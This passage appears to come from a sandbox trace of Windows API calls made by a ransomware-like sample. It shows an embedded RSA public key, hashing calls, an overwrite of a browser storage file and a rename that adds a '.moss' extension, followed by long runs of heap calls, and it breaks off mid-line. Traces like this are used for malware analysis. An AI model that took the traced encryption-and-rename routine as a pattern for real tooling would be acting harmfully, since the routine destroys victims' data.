KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0173.181] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ed88) returned 1 [0173.182] CryptCreateHash (in: hProv=0xd2ed88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0173.182] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0173.182] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0173.182] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0173.182] GetLastError () returned 0x0 [0173.182] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0173.183] CryptReleaseContext (hProv=0xd2ed88, dwFlags=0x0) returned 1 [0173.183] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0173.183] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0173.183] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0173.183] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0173.183] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0173.183] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0173.183] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.183] WriteFile (in: hFile=0x664, lpBuffer=0x35ceae8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35ceae8*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0173.184] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0173.184] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml.moss")) returned 1 [0173.185] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0173.185] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0173.185] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0173.186] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0173.186] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54b05050, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imagesrv.adition[1].xml", cAlternateFileName="IMAGES~1.XML")) returned 0 [0173.186] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.187] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0173.187] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a070 | out: hHeap=0xcd0000) returned 1 [0173.187] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.187] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a070 [0173.187] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0173.187] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.187] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.187] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.187] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.187] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.187] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.187] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.187] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.187] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.187] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.187] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.187] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.187] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.187] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.187] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.187] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.187] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.187] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.187] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.187] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.187] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.187] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.188] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.188] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.188] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.188] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.188] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0173.188] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.188] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0173.188] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.188] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.188] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.188] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.188] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.188] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.188] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.188] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.188] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.188] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.188] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0173.188] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.188] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.188] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.188] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0173.189] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.189] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.189] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.189] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.189] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.189] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.189] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.189] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.189] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.189] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.189] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.189] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.189] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.189] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.190] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.190] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.190] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.190] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.190] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.190] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.190] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.190] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.190] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.190] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0173.190] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.190] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0173.190] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.191] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.191] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0173.191] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.191] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0173.191] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0173.191] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.191] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0173.191] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.191] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.191] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.191] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.191] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.191] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0173.192] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.192] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0173.192] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.192] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.192] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.192] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.192] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.192] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.192] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.192] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.192] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.192] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.193] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.193] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.193] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.193] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.193] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.193] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.193] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.193] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.193] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.193] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.193] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0173.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0173.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.193] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.193] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.194] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.194] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0173.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.194] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.194] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0173.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.194] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.194] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.194] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.194] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.194] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.194] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.194] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 